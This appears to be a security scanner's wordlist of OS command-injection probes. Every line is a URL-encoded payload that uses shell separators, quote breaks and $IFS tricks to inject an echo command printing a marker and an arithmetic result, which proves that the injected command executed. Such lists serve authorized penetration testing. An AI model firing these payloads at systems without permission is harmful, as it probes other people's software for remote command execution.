+os-command-injection,'%27|echo$IFSTBYTAT$((44%2B46))$(echo$IFSTBYTAT)TBYTAT%7C' +os-command-injection,'%27||echo$IFSRQPTDA$((77%2B60))$(echo$IFSRQPTDA)RQPTDA%7C' +os-command-injection,'%27&&echo$IFSGQWBLL$((20%2B82))$(echo$IFSGQWBLL)GQWBLL%7C' +os-command-injection,'%27%0aecho$IFSNTGMHS$((16%2B18))$(echo$IFSNTGMHS)NTGMHS%7C' +os-command-injection,'%27%3Becho$IFSHXPCVJ$((50%2B88))$(echo$IFSHXPCVJ)HXPCVJ%7C' +os-command-injection,'%27%26echo$IFSKBFTYY$((46%2B12))$(echo$IFSKBFTYY)KBFTYY%7C' +os-command-injection,'%27%26%26echo$IFSMBEHLC$((29%2B30))$(echo$IFSMBEHLC)MBEHLC%7C' +os-command-injection,'%27%7Cecho$IFSKCJERS$((61%2B84))$(echo$IFSKCJERS)KCJERS%7C' +os-command-injection,'%27%7C%7Cecho$IFSUDYXOW$((85%2B10))$(echo$IFSUDYXOW)UDYXOW%7C' +os-command-injection,'%22echo$IFSNYPPVL$((60%2B65))$(echo$IFSNYPPVL)NYPPVL' +os-command-injection,'%22%20echo%20TENJSX$((79%2B73))$(echo%20TENJSX)TENJSX' +os-command-injection,'%22;echo$IFSZRPLSF$((25%2B59))$(echo$IFSZRPLSF)ZRPLSF' +os-command-injection,'%22&echo$IFSMYMGJG$((67%2B19))$(echo$IFSMYMGJG)MYMGJG' +os-command-injection,'%22|echo$IFSFHBVSW$((89%2B96))$(echo$IFSFHBVSW)FHBVSW' +os-command-injection,'%22||echo$IFSXJETQS$((39%2B59))$(echo$IFSXJETQS)XJETQS' +os-command-injection,'%22&&echo$IFSNPVQVS$((92%2B44))$(echo$IFSNPVQVS)NPVQVS' +os-command-injection,'%22%0aecho$IFSGUMDYN$((0%2B81))$(echo$IFSGUMDYN)GUMDYN' +os-command-injection,'%22%3Becho$IFSBXFYAK$((0%2B86))$(echo$IFSBXFYAK)BXFYAK' +os-command-injection,'%22%26echo$IFSAVKDKB$((96%2B57))$(echo$IFSAVKDKB)AVKDKB' +os-command-injection,'%22%26%26echo$IFSQIRZPO$((66%2B91))$(echo$IFSQIRZPO)QIRZPO' +os-command-injection,'%22%7Cecho$IFSDCXXXG$((2%2B46))$(echo$IFSDCXXXG)DCXXXG' +os-command-injection,'%22%7C%7Cecho$IFSAGYUYQ$((68%2B32))$(echo$IFSAGYUYQ)AGYUYQ' +os-command-injection,'%22echo$IFSTXEBDL$((98%2B30))$(echo$IFSTXEBDL)TXEBDL'' +os-command-injection,'%22%20echo%20LSKHTI$((85%2B74))$(echo%20LSKHTI)LSKHTI'' +os-command-injection,'%22;echo$IFSKDCQSI$((18%2B31))$(echo$IFSKDCQSI)KDCQSI'' +os-command-injection,'%22&echo$IFSVYULFC$((89%2B15))$(echo$IFSVYULFC)VYULFC'' +os-command-injection,'%22|echo$IFSYOKEXI$((60%2B52))$(echo$IFSYOKEXI)YOKEXI'' +os-command-injection,'%22||echo$IFSWIGSBP$((63%2B65))$(echo$IFSWIGSBP)WIGSBP'' +os-command-injection,'%22&&echo$IFSZFCQFQ$((13%2B98))$(echo$IFSZFCQFQ)ZFCQFQ'' +os-command-injection,'%22%0aecho$IFSTCCVZI$((1%2B35))$(echo$IFSTCCVZI)TCCVZI'' +os-command-injection,'%22%3Becho$IFSWDYXMD$((62%2B40))$(echo$IFSWDYXMD)WDYXMD'' +os-command-injection,'%22%26echo$IFSLOHVXK$((39%2B85))$(echo$IFSLOHVXK)LOHVXK'' +os-command-injection,'%22%26%26echo$IFSBWWMGD$((16%2B23))$(echo$IFSBWWMGD)BWWMGD'' +os-command-injection,'%22%7Cecho$IFSKVTRBW$((82%2B81))$(echo$IFSKVTRBW)KVTRBW'' +os-command-injection,'%22%7C%7Cecho$IFSYZFWPL$((54%2B79))$(echo$IFSYZFWPL)YZFWPL'' +os-command-injection,'%22echo$IFSGIZFRE$((56%2B79))$(echo$IFSGIZFRE)GIZFRE"' +os-command-injection,'%22%20echo%20BWDHGF$((47%2B6))$(echo%20BWDHGF)BWDHGF"' +os-command-injection,'%22;echo$IFSVBRGVR$((55%2B92))$(echo$IFSVBRGVR)VBRGVR"' +os-command-injection,'%22&echo$IFSKRRDDG$((27%2B70))$(echo$IFSKRRDDG)KRRDDG"' +os-command-injection,'%22|echo$IFSCSECOD$((94%2B97))$(echo$IFSCSECOD)CSECOD"' +os-command-injection,'%22||echo$IFSQCMNBQ$((8%2B12))$(echo$IFSQCMNBQ)QCMNBQ"' +os-command-injection,'%22&&echo$IFSKHRFCH$((77%2B13))$(echo$IFSKHRFCH)KHRFCH"' +os-command-injection,'%22%0aecho$IFSVFVGSF$((75%2B11))$(echo$IFSVFVGSF)VFVGSF"' +os-command-injection,'%22%3Becho$IFSFILOPR$((54%2B95))$(echo$IFSFILOPR)FILOPR"' +os-command-injection,'%22%26echo$IFSRHEKFG$((34%2B24))$(echo$IFSRHEKFG)RHEKFG"' +os-command-injection,'%22%26%26echo$IFSQAQXNJ$((73%2B59))$(echo$IFSQAQXNJ)QAQXNJ"' +os-command-injection,'%22%7Cecho$IFSEKCYEJ$((30%2B67))$(echo$IFSEKCYEJ)EKCYEJ"' +os-command-injection,'%22%7C%7Cecho$IFSPBFHAG$((38%2B37))$(echo$IFSPBFHAG)PBFHAG"' +os-command-injection,'%22echo$IFSXFAZVQ$((31%2B75))$(echo$IFSXFAZVQ)XFAZVQ' +os-command-injection,'%22%20echo%20YKSYRU$((78%2B80))$(echo%20YKSYRU)YKSYRU' +os-command-injection,'%22;echo$IFSPOSWYF$((84%2B58))$(echo$IFSPOSWYF)POSWYF' +os-command-injection,'%22&echo$IFSUTHIQI$((14%2B78))$(echo$IFSUTHIQI)UTHIQI' +os-command-injection,'%22|echo$IFSKEDUES$((72%2B2))$(echo$IFSKEDUES)KEDUES' +os-command-injection,'%22||echo$IFSXQFITQ$((91%2B69))$(echo$IFSXQFITQ)XQFITQ' +os-command-injection,'%22&&echo$IFSUZURTK$((89%2B35))$(echo$IFSUZURTK)UZURTK' +os-command-injection,'%22%0aecho$IFSSROBII$((44%2B41))$(echo$IFSSROBII)SROBII' +os-command-injection,'%22%3Becho$IFSUGGAXQ$((15%2B25))$(echo$IFSUGGAXQ)UGGAXQ' +os-command-injection,'%22%26echo$IFSPXWAWG$((93%2B23))$(echo$IFSPXWAWG)PXWAWG' +os-command-injection,'%22%26%26echo$IFSHIGDVX$((46%2B84))$(echo$IFSHIGDVX)HIGDVX' +os-command-injection,'%22%7Cecho$IFSHASPPT$((51%2B64))$(echo$IFSHASPPT)HASPPT' +os-command-injection,'%22%7C%7Cecho$IFSBKQQRP$((31%2B59))$(echo$IFSBKQQRP)BKQQRP' +os-command-injection,'%22echo$IFSWDFJWS$((72%2B66))$(echo$IFSWDFJWS)WDFJWS//' +os-command-injection,'%22%20echo%20EJENVL$((99%2B67))$(echo%20EJENVL)EJENVL//' +os-command-injection,'%22;echo$IFSOYDJLD$((49%2B19))$(echo$IFSOYDJLD)OYDJLD//' +os-command-injection,'%22&echo$IFSETXJTM$((83%2B22))$(echo$IFSETXJTM)ETXJTM//' +os-command-injection,'%22|echo$IFSPRGTJG$((24%2B21))$(echo$IFSPRGTJG)PRGTJG//' +os-command-injection,'%22||echo$IFSBZQTDK$((6%2B37))$(echo$IFSBZQTDK)BZQTDK//' +os-command-injection,'%22&&echo$IFSCHCIGA$((57%2B69))$(echo$IFSCHCIGA)CHCIGA//' +os-command-injection,'%22%0aecho$IFSWNJDID$((57%2B88))$(echo$IFSWNJDID)WNJDID//' +os-command-injection,'%22%3Becho$IFSQXLDBX$((32%2B84))$(echo$IFSQXLDBX)QXLDBX//' +os-command-injection,'%22%26echo$IFSVNUDZG$((59%2B14))$(echo$IFSVNUDZG)VNUDZG//' +os-command-injection,'%22%26%26echo$IFSWJRXOQ$((50%2B45))$(echo$IFSWJRXOQ)WJRXOQ//' +os-command-injection,'%22%7Cecho$IFSHVKNCE$((69%2B89))$(echo$IFSHVKNCE)HVKNCE//' +os-command-injection,'%22%7C%7Cecho$IFSZCCTFB$((82%2B55))$(echo$IFSZCCTFB)ZCCTFB//' +os-command-injection,'%22echo$IFSWYLAHG$((98%2B68))$(echo$IFSWYLAHG)WYLAHG\' +os-command-injection,'%22%20echo%20VXREMW$((56%2B44))$(echo%20VXREMW)VXREMW\' +os-command-injection,'%22;echo$IFSFJALAO$((19%2B27))$(echo$IFSFJALAO)FJALAO\' +os-command-injection,'%22&echo$IFSZRBHJA$((51%2B20))$(echo$IFSZRBHJA)ZRBHJA\' +os-command-injection,'%22|echo$IFSMNAWIZ$((59%2B73))$(echo$IFSMNAWIZ)MNAWIZ\' +os-command-injection,'%22||echo$IFSLTPOTF$((71%2B76))$(echo$IFSLTPOTF)LTPOTF\' +os-command-injection,'%22&&echo$IFSQUQQGM$((39%2B7))$(echo$IFSQUQQGM)QUQQGM\' +os-command-injection,'%22%0aecho$IFSLGKPQJ$((93%2B84))$(echo$IFSLGKPQJ)LGKPQJ\' +os-command-injection,'%22%3Becho$IFSHGTRCU$((62%2B99))$(echo$IFSHGTRCU)HGTRCU\' +os-command-injection,'%22%26echo$IFSITFACB$((45%2B74))$(echo$IFSITFACB)ITFACB\' +os-command-injection,'%22%26%26echo$IFSEFRNKR$((8%2B15))$(echo$IFSEFRNKR)EFRNKR\' +os-command-injection,'%22%7Cecho$IFSTDGCCD$((4%2B88))$(echo$IFSTDGCCD)TDGCCD\' +os-command-injection,'%22%7C%7Cecho$IFSBVGJOE$((17%2B25))$(echo$IFSBVGJOE)BVGJOE\' +os-command-injection,'%22echo$IFSKGAXGA$((7%2B86))$(echo$IFSKGAXGA)KGAXGA&' +os-command-injection,'%22%20echo%20KEMGCU$((7%2B98))$(echo%20KEMGCU)KEMGCU&' +os-command-injection,'%22;echo$IFSHZZDKE$((23%2B65))$(echo$IFSHZZDKE)HZZDKE&' +os-command-injection,'%22&echo$IFSMDGOWJ$((0%2B29))$(echo$IFSMDGOWJ)MDGOWJ&' +os-command-injection,'%22|echo$IFSXYSMQM$((74%2B33))$(echo$IFSXYSMQM)XYSMQM&' +os-command-injection,'%22||echo$IFSKOKMSK$((17%2B27))$(echo$IFSKOKMSK)KOKMSK&' +os-command-injection,'%22&&echo$IFSIFCQGE$((84%2B65))$(echo$IFSIFCQGE)IFCQGE&' +os-command-injection,'%22%0aecho$IFSFNPDLF$((30%2B38))$(echo$IFSFNPDLF)FNPDLF&' +os-command-injection,'%22%3Becho$IFSSHWRSB$((43%2B89))$(echo$IFSSHWRSB)SHWRSB&' +os-command-injection,'%22%26echo$IFSPAQLDV$((40%2B74))$(echo$IFSPAQLDV)PAQLDV&' +os-command-injection,'%22%26%26echo$IFSTNKVRD$((74%2B48))$(echo$IFSTNKVRD)TNKVRD&' +os-command-injection,'%22%7Cecho$IFSNNKINL$((7%2B56))$(echo$IFSNNKINL)NNKINL&' +os-command-injection,'%22%7C%7Cecho$IFSACDZIF$((7%2B56))$(echo$IFSACDZIF)ACDZIF&' +os-command-injection,'%22echo$IFSNSPJAR$((7%2B90))$(echo$IFSNSPJAR)NSPJAR|' +os-command-injection,'%22%20echo%20KBNUFV$((78%2B52))$(echo%20KBNUFV)KBNUFV|' +os-command-injection,'%22;echo$IFSRBNXNK$((31%2B22))$(echo$IFSRBNXNK)RBNXNK|' +os-command-injection,'%22&echo$IFSTZXMJD$((12%2B74))$(echo$IFSTZXMJD)TZXMJD|' +os-command-injection,'%22|echo$IFSIQYKZJ$((13%2B97))$(echo$IFSIQYKZJ)IQYKZJ|' +os-command-injection,'%22||echo$IFSTGMYGU$((64%2B59))$(echo$IFSTGMYGU)TGMYGU|' +os-command-injection,'%22&&echo$IFSUTEHBK$((73%2B4))$(echo$IFSUTEHBK)UTEHBK|' +os-command-injection,'%22%0aecho$IFSNPYCHN$((67%2B35))$(echo$IFSNPYCHN)NPYCHN|' +os-command-injection,'%22%3Becho$IFSLWFTCJ$((19%2B88))$(echo$IFSLWFTCJ)LWFTCJ|' +os-command-injection,'%22%26echo$IFSVHAUOY$((79%2B26))$(echo$IFSVHAUOY)VHAUOY|' +os-command-injection,'%22%26%26echo$IFSTNMDEE$((29%2B83))$(echo$IFSTNMDEE)TNMDEE|' +os-command-injection,'%22%7Cecho$IFSEICSZJ$((51%2B32))$(echo$IFSEICSZJ)EICSZJ|' +os-command-injection,'%22%7C%7Cecho$IFSBAKJOM$((61%2B8))$(echo$IFSBAKJOM)BAKJOM|' +os-command-injection,'%22echo$IFSJUCOSG$((27%2B40))$(echo$IFSJUCOSG)JUCOSG%27' +os-command-injection,'%22%20echo%20HLEPQM$((13%2B16))$(echo%20HLEPQM)HLEPQM%27' +os-command-injection,'%22;echo$IFSIEYMTU$((1%2B88))$(echo$IFSIEYMTU)IEYMTU%27' +os-command-injection,'%22&echo$IFSHQDBCP$((68%2B4))$(echo$IFSHQDBCP)HQDBCP%27' +os-command-injection,'%22|echo$IFSQWZGUZ$((67%2B7))$(echo$IFSQWZGUZ)QWZGUZ%27' +os-command-injection,'%22||echo$IFSDTOBHC$((30%2B47))$(echo$IFSDTOBHC)DTOBHC%27' +os-command-injection,'%22&&echo$IFSKGECJW$((94%2B78))$(echo$IFSKGECJW)KGECJW%27' +os-command-injection,'%22%0aecho$IFSUTHJSW$((11%2B12))$(echo$IFSUTHJSW)UTHJSW%27' +os-command-injection,'%22%3Becho$IFSTCLHEV$((0%2B38))$(echo$IFSTCLHEV)TCLHEV%27' +os-command-injection,'%22%26echo$IFSNPBSWH$((19%2B90))$(echo$IFSNPBSWH)NPBSWH%27' +os-command-injection,'%22%26%26echo$IFSBMSDKL$((25%2B99))$(echo$IFSBMSDKL)BMSDKL%27' +os-command-injection,'%22%7Cecho$IFSUSGSMP$((39%2B12))$(echo$IFSUSGSMP)USGSMP%27' +os-command-injection,'%22%7C%7Cecho$IFSZJBERF$((35%2B91))$(echo$IFSZJBERF)ZJBERF%27' +os-command-injection,'%22echo$IFSJBTZFF$((9%2B76))$(echo$IFSJBTZFF)JBTZFF%22' +os-command-injection,'%22%20echo%20ZELXMV$((25%2B23))$(echo%20ZELXMV)ZELXMV%22' +os-command-injection,'%22;echo$IFSCOXAAL$((47%2B23))$(echo$IFSCOXAAL)COXAAL%22' +os-command-injection,'%22&echo$IFSWFDEUL$((80%2B90))$(echo$IFSWFDEUL)WFDEUL%22' +os-command-injection,'%22|echo$IFSEYJFJS$((66%2B81))$(echo$IFSEYJFJS)EYJFJS%22' +os-command-injection,'%22||echo$IFSUMCJZQ$((83%2B7))$(echo$IFSUMCJZQ)UMCJZQ%22' +os-command-injection,'%22&&echo$IFSTCFOHQ$((83%2B93))$(echo$IFSTCFOHQ)TCFOHQ%22' +os-command-injection,'%22%0aecho$IFSWVTSGH$((63%2B36))$(echo$IFSWVTSGH)WVTSGH%22' +os-command-injection,'%22%3Becho$IFSLKBKVH$((78%2B91))$(echo$IFSLKBKVH)LKBKVH%22' +os-command-injection,'%22%26echo$IFSIETGIV$((33%2B31))$(echo$IFSIETGIV)IETGIV%22' +os-command-injection,'%22%26%26echo$IFSUDIYDY$((28%2B5))$(echo$IFSUDIYDY)UDIYDY%22' +os-command-injection,'%22%7Cecho$IFSVOMUAL$((49%2B92))$(echo$IFSVOMUAL)VOMUAL%22' +os-command-injection,'%22%7C%7Cecho$IFSXHMLVN$((71%2B63))$(echo$IFSXHMLVN)XHMLVN%22' +os-command-injection,'%22echo$IFSEBQHZC$((54%2B58))$(echo$IFSEBQHZC)EBQHZC%5C%5C' +os-command-injection,'%22%20echo%20DXYHWC$((70%2B59))$(echo%20DXYHWC)DXYHWC%5C%5C' +os-command-injection,'%22;echo$IFSBKQZPW$((40%2B60))$(echo$IFSBKQZPW)BKQZPW%5C%5C' +os-command-injection,'%22&echo$IFSBYMLDE$((27%2B63))$(echo$IFSBYMLDE)BYMLDE%5C%5C' +os-command-injection,'%22|echo$IFSHWGVIM$((90%2B18))$(echo$IFSHWGVIM)HWGVIM%5C%5C' +os-command-injection,'%22||echo$IFSANXKRH$((27%2B96))$(echo$IFSANXKRH)ANXKRH%5C%5C' +os-command-injection,'%22&&echo$IFSZDMIIV$((60%2B55))$(echo$IFSZDMIIV)ZDMIIV%5C%5C' +os-command-injection,'%22%0aecho$IFSECUVPP$((94%2B69))$(echo$IFSECUVPP)ECUVPP%5C%5C' +os-command-injection,'%22%3Becho$IFSXMIXIV$((74%2B96))$(echo$IFSXMIXIV)XMIXIV%5C%5C' +os-command-injection,'%22%26echo$IFSEVHWEV$((99%2B12))$(echo$IFSEVHWEV)EVHWEV%5C%5C' +os-command-injection,'%22%26%26echo$IFSKPOBYP$((90%2B6))$(echo$IFSKPOBYP)KPOBYP%5C%5C' +os-command-injection,'%22%7Cecho$IFSOQPWKQ$((62%2B90))$(echo$IFSOQPWKQ)OQPWKQ%5C%5C' +os-command-injection,'%22%7C%7Cecho$IFSFUISVY$((37%2B75))$(echo$IFSFUISVY)FUISVY%5C%5C' +os-command-injection,'%22echo$IFSPXHSMC$((2%2B51))$(echo$IFSPXHSMC)PXHSMC%2F%2F' +os-command-injection,'%22%20echo%20CCPWJP$((28%2B45))$(echo%20CCPWJP)CCPWJP%2F%2F' +os-command-injection,'%22;echo$IFSPNIBTX$((67%2B98))$(echo$IFSPNIBTX)PNIBTX%2F%2F' +os-command-injection,'%22&echo$IFSQOVIJM$((98%2B90))$(echo$IFSQOVIJM)QOVIJM%2F%2F' +os-command-injection,'%22|echo$IFSNEANFV$((47%2B58))$(echo$IFSNEANFV)NEANFV%2F%2F' +os-command-injection,'%22||echo$IFSKQELND$((18%2B15))$(echo$IFSKQELND)KQELND%2F%2F' +os-command-injection,'%22&&echo$IFSALIQNR$((1%2B51))$(echo$IFSALIQNR)ALIQNR%2F%2F' +os-command-injection,'%22%0aecho$IFSVMXLXF$((85%2B89))$(echo$IFSVMXLXF)VMXLXF%2F%2F' +os-command-injection,'%22%3Becho$IFSEJXJHO$((22%2B15))$(echo$IFSEJXJHO)EJXJHO%2F%2F' +os-command-injection,'%22%26echo$IFSQJRCGM$((21%2B21))$(echo$IFSQJRCGM)QJRCGM%2F%2F' +os-command-injection,'%22%26%26echo$IFSQZIYEJ$((0%2B21))$(echo$IFSQZIYEJ)QZIYEJ%2F%2F' +os-command-injection,'%22%7Cecho$IFSDRZFAI$((10%2B79))$(echo$IFSDRZFAI)DRZFAI%2F%2F' +os-command-injection,'%22%7C%7Cecho$IFSXPSNLK$((16%2B69))$(echo$IFSXPSNLK)XPSNLK%2F%2F' +os-command-injection,'%22echo$IFSYOHOJL$((56%2B39))$(echo$IFSYOHOJL)YOHOJL%26' +os-command-injection,'%22%20echo%20XXGYFR$((27%2B40))$(echo%20XXGYFR)XXGYFR%26' +os-command-injection,'%22;echo$IFSHREURS$((4%2B58))$(echo$IFSHREURS)HREURS%26' +os-command-injection,'%22&echo$IFSWGOXEF$((82%2B13))$(echo$IFSWGOXEF)WGOXEF%26' +os-command-injection,'%22|echo$IFSVUODLE$((87%2B48))$(echo$IFSVUODLE)VUODLE%26' +os-command-injection,'%22||echo$IFSQAACSL$((16%2B49))$(echo$IFSQAACSL)QAACSL%26' +os-command-injection,'%22&&echo$IFSEBZXUY$((79%2B44))$(echo$IFSEBZXUY)EBZXUY%26' +os-command-injection,'%22%0aecho$IFSGKNCHV$((13%2B8))$(echo$IFSGKNCHV)GKNCHV%26' +os-command-injection,'%22%3Becho$IFSBYDVLH$((40%2B59))$(echo$IFSBYDVLH)BYDVLH%26' +os-command-injection,'%22%26echo$IFSUGHPED$((99%2B93))$(echo$IFSUGHPED)UGHPED%26' +os-command-injection,'%22%26%26echo$IFSJIGDYZ$((64%2B13))$(echo$IFSJIGDYZ)JIGDYZ%26' +os-command-injection,'%22%7Cecho$IFSWRMIXV$((36%2B74))$(echo$IFSWRMIXV)WRMIXV%26' +os-command-injection,'%22%7C%7Cecho$IFSGSYMFU$((44%2B78))$(echo$IFSGSYMFU)GSYMFU%26' +os-command-injection,'%22echo$IFSXVVJRH$((4%2B71))$(echo$IFSXVVJRH)XVVJRH%7C' +os-command-injection,'%22%20echo%20LWNPLT$((96%2B42))$(echo%20LWNPLT)LWNPLT%7C' +os-command-injection,'%22;echo$IFSUOJTRY$((93%2B10))$(echo$IFSUOJTRY)UOJTRY%7C' +os-command-injection,'%22&echo$IFSGVEIAO$((60%2B74))$(echo$IFSGVEIAO)GVEIAO%7C' +os-command-injection,'%22|echo$IFSIJEOUD$((95%2B12))$(echo$IFSIJEOUD)IJEOUD%7C' +os-command-injection,'%22||echo$IFSOJFYUI$((71%2B37))$(echo$IFSOJFYUI)OJFYUI%7C' +os-command-injection,'%22&&echo$IFSCYRNGO$((16%2B47))$(echo$IFSCYRNGO)CYRNGO%7C' +os-command-injection,'%22%0aecho$IFSURWJYQ$((9%2B54))$(echo$IFSURWJYQ)URWJYQ%7C' +os-command-injection,'%22%3Becho$IFSRPJGSG$((43%2B49))$(echo$IFSRPJGSG)RPJGSG%7C' +os-command-injection,'%22%26echo$IFSLJECUX$((80%2B24))$(echo$IFSLJECUX)LJECUX%7C' +os-command-injection,'%22%26%26echo$IFSBQHTLW$((57%2B18))$(echo$IFSBQHTLW)BQHTLW%7C' +os-command-injection,'%22%7Cecho$IFSXVXORA$((57%2B55))$(echo$IFSXVXORA)XVXORA%7C' +os-command-injection,'%22%7C%7Cecho$IFSBNKMZL$((51%2B20))$(echo$IFSBNKMZL)BNKMZL%7C' +os-command-injection,'%7Cecho$IFSOKJGAG$((39%2B76))$(echo$IFSOKJGAG)OKJGAG' +os-command-injection,'%7C%20echo%20HCOMBJ$((69%2B6))$(echo%20HCOMBJ)HCOMBJ' +os-command-injection,';echo$IFSXAJUQV$((80%2B48))$(echo$IFSXAJUQV)XAJUQV' +os-command-injection,'&echo$IFSOHDHIG$((24%2B5))$(echo$IFSOHDHIG)OHDHIG' +os-command-injection,'|echo$IFSYHJJYR$((16%2B67))$(echo$IFSYHJJYR)YHJJYR' +os-command-injection,'||echo$IFSCGCLSD$((78%2B73))$(echo$IFSCGCLSD)CGCLSD' +os-command-injection,'&&echo$IFSKJOVJF$((86%2B99))$(echo$IFSKJOVJF)KJOVJF' +os-command-injection,'%0aecho$IFSOGNJPF$((26%2B51))$(echo$IFSOGNJPF)OGNJPF' +os-command-injection,'%3Becho$IFSKZGJJF$((9%2B27))$(echo$IFSKZGJJF)KZGJJF' +os-command-injection,'%26echo$IFSDEDUEE$((30%2B57))$(echo$IFSDEDUEE)DEDUEE' +os-command-injection,'%26%26echo$IFSHKWBBD$((73%2B37))$(echo$IFSHKWBBD)HKWBBD' +os-command-injection,'%7Cecho$IFSGZSLCQ$((53%2B35))$(echo$IFSGZSLCQ)GZSLCQ' +os-command-injection,'%7C%7Cecho$IFSJRICXJ$((75%2B92))$(echo$IFSJRICXJ)JRICXJ' +os-command-injection,'echo$IFSHWDYSD$((37%2B57))$(echo$IFSHWDYSD)HWDYSD'' +os-command-injection,'%20echo%20NEBPFW$((3%2B70))$(echo%20NEBPFW)NEBPFW'' +os-command-injection,';echo$IFSEPLQYO$((94%2B56))$(echo$IFSEPLQYO)EPLQYO'' +os-command-injection,'&echo$IFSTTHLQC$((84%2B38))$(echo$IFSTTHLQC)TTHLQC'' +os-command-injection,'|echo$IFSGKBHIR$((84%2B74))$(echo$IFSGKBHIR)GKBHIR'' +os-command-injection,'||echo$IFSSBWRDD$((13%2B29))$(echo$IFSSBWRDD)SBWRDD'' +os-command-injection,'&&echo$IFSKIKNVD$((50%2B78))$(echo$IFSKIKNVD)KIKNVD'' +os-command-injection,'%0aecho$IFSOFYRTU$((52%2B75))$(echo$IFSOFYRTU)OFYRTU'' +os-command-injection,'%3Becho$IFSJPYDWY$((21%2B37))$(echo$IFSJPYDWY)JPYDWY'' +os-command-injection,'%26echo$IFSXCPZTM$((92%2B95))$(echo$IFSXCPZTM)XCPZTM'' +os-command-injection,'%26%26echo$IFSWOKOCD$((20%2B68))$(echo$IFSWOKOCD)WOKOCD'' +os-command-injection,'%7Cecho$IFSSUUIHX$((40%2B15))$(echo$IFSSUUIHX)SUUIHX'' +os-command-injection,'%7C%7Cecho$IFSAVXTXG$((18%2B58))$(echo$IFSAVXTXG)AVXTXG'' +os-command-injection,'echo$IFSXXONVG$((27%2B27))$(echo$IFSXXONVG)XXONVG"' +os-command-injection,'%20echo%20PFLQEA$((81%2B37))$(echo%20PFLQEA)PFLQEA"' +os-command-injection,';echo$IFSMDODNG$((16%2B33))$(echo$IFSMDODNG)MDODNG"' +os-command-injection,'&echo$IFSUFORJE$((32%2B39))$(echo$IFSUFORJE)UFORJE"' +os-command-injection,'|echo$IFSBTKIBL$((76%2B11))$(echo$IFSBTKIBL)BTKIBL"' +os-command-injection,'||echo$IFSZVZDHM$((59%2B26))$(echo$IFSZVZDHM)ZVZDHM"' +os-command-injection,'&&echo$IFSLWMKLS$((30%2B88))$(echo$IFSLWMKLS)LWMKLS"' +os-command-injection,'%0aecho$IFSCJKHEO$((35%2B18))$(echo$IFSCJKHEO)CJKHEO"' +os-command-injection,'%3Becho$IFSUSDTON$((86%2B41))$(echo$IFSUSDTON)USDTON"' +os-command-injection,'%26echo$IFSIAHRZI$((77%2B68))$(echo$IFSIAHRZI)IAHRZI"' +os-command-injection,'%26%26echo$IFSONQKZZ$((73%2B7))$(echo$IFSONQKZZ)ONQKZZ"' +os-command-injection,'%7Cecho$IFSYRTPVW$((55%2B57))$(echo$IFSYRTPVW)YRTPVW"' +os-command-injection,'%7C%7Cecho$IFSMXRPLY$((63%2B48))$(echo$IFSMXRPLY)MXRPLY"' +os-command-injection,'echo$IFSBPKGGQ$((2%2B10))$(echo$IFSBPKGGQ)BPKGGQ' +os-command-injection,'%20echo%20EPJLZM$((66%2B41))$(echo%20EPJLZM)EPJLZM' +os-command-injection,';echo$IFSFRFTEV$((68%2B37))$(echo$IFSFRFTEV)FRFTEV' +os-command-injection,'&echo$IFSNNJHEA$((98%2B76))$(echo$IFSNNJHEA)NNJHEA' +os-command-injection,'|echo$IFSDJRUFH$((97%2B3))$(echo$IFSDJRUFH)DJRUFH' +os-command-injection,'||echo$IFSYXCWNR$((16%2B34))$(echo$IFSYXCWNR)YXCWNR' +os-command-injection,'&&echo$IFSSUKTVK$((49%2B30))$(echo$IFSSUKTVK)SUKTVK' +os-command-injection,'%0aecho$IFSRASFNL$((85%2B74))$(echo$IFSRASFNL)RASFNL' +os-command-injection,'%3Becho$IFSHNITQI$((34%2B44))$(echo$IFSHNITQI)HNITQI' +os-command-injection,'%26echo$IFSFQWXOL$((0%2B18))$(echo$IFSFQWXOL)FQWXOL' +os-command-injection,'%26%26echo$IFSJLTIEA$((92%2B83))$(echo$IFSJLTIEA)JLTIEA' +os-command-injection,'%7Cecho$IFSJFVTNC$((92%2B51))$(echo$IFSJFVTNC)JFVTNC' +os-command-injection,'%7C%7Cecho$IFSOTLHMR$((33%2B79))$(echo$IFSOTLHMR)OTLHMR' +os-command-injection,'echo$IFSRDFLJS$((32%2B99))$(echo$IFSRDFLJS)RDFLJS//' +os-command-injection,'%20echo%20EBRLPU$((95%2B26))$(echo%20EBRLPU)EBRLPU//' +os-command-injection,';echo$IFSLFANAU$((10%2B58))$(echo$IFSLFANAU)LFANAU//' +os-command-injection,'&echo$IFSASNAHP$((25%2B52))$(echo$IFSASNAHP)ASNAHP//' +os-command-injection,'|echo$IFSYIICFW$((82%2B30))$(echo$IFSYIICFW)YIICFW//' +os-command-injection,'||echo$IFSANCXJL$((61%2B40))$(echo$IFSANCXJL)ANCXJL//' +os-command-injection,'&&echo$IFSKMSEPJ$((48%2B32))$(echo$IFSKMSEPJ)KMSEPJ//' +os-command-injection,'%0aecho$IFSKIZTDU$((42%2B50))$(echo$IFSKIZTDU)KIZTDU//' +os-command-injection,'%3Becho$IFSYTBVMU$((36%2B61))$(echo$IFSYTBVMU)YTBVMU//' +os-command-injection,'%26echo$IFSQOEJNZ$((82%2B42))$(echo$IFSQOEJNZ)QOEJNZ//' +os-command-injection,'%26%26echo$IFSCGEGYR$((45%2B27))$(echo$IFSCGEGYR)CGEGYR//' +os-command-injection,'%7Cecho$IFSEQEOTH$((5%2B24))$(echo$IFSEQEOTH)EQEOTH//' +os-command-injection,'%7C%7Cecho$IFSTGFHRF$((49%2B19))$(echo$IFSTGFHRF)TGFHRF//' +os-command-injection,'echo$IFSOKGHZD$((31%2B37))$(echo$IFSOKGHZD)OKGHZD\' +os-command-injection,'%20echo%20LHYXBV$((13%2B29))$(echo%20LHYXBV)LHYXBV\' +os-command-injection,';echo$IFSOZHGXS$((54%2B58))$(echo$IFSOZHGXS)OZHGXS\' +os-command-injection,'&echo$IFSQCRUCK$((10%2B80))$(echo$IFSQCRUCK)QCRUCK\' +os-command-injection,'|echo$IFSJJVJHF$((77%2B32))$(echo$IFSJJVJHF)JJVJHF\' +os-command-injection,'||echo$IFSVMDOKC$((46%2B15))$(echo$IFSVMDOKC)VMDOKC\' +os-command-injection,'&&echo$IFSMRIURT$((57%2B24))$(echo$IFSMRIURT)MRIURT\' +os-command-injection,'%0aecho$IFSDEIFSG$((86%2B72))$(echo$IFSDEIFSG)DEIFSG\' +os-command-injection,'%3Becho$IFSOIOFGF$((91%2B26))$(echo$IFSOIOFGF)OIOFGF\' +os-command-injection,'%26echo$IFSOKMGIJ$((46%2B23))$(echo$IFSOKMGIJ)OKMGIJ\' +os-command-injection,'%26%26echo$IFSBAXLLS$((32%2B52))$(echo$IFSBAXLLS)BAXLLS\' +os-command-injection,'%7Cecho$IFSHYXPLP$((94%2B38))$(echo$IFSHYXPLP)HYXPLP\' 